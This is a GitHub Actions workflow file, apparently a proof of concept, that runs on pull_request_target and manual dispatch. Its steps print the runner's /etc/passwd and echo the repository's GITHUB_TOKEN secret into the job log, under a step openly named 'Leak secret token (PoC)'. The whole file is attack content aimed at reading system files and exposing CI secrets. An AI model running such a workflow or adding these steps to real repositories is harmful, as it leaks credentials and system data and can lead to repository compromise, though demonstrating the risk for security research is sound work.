name: Show Runner Passwd File

on:
  workflow_dispatch:
  pull_request_target:
    types: [opened, synchronize, edited]

jobs:
  show-passwd:
    runs-on: ubuntu-latest
    steps:
      - name: Display /etc/passwd
        run: cat /etc/passwd

      - name: Leak secret token (PoC)
        run: |
          echo "[+] GITHUB_TOKEN is accessible!"
          echo "${{ secrets.GITHUB_TOKEN }}"
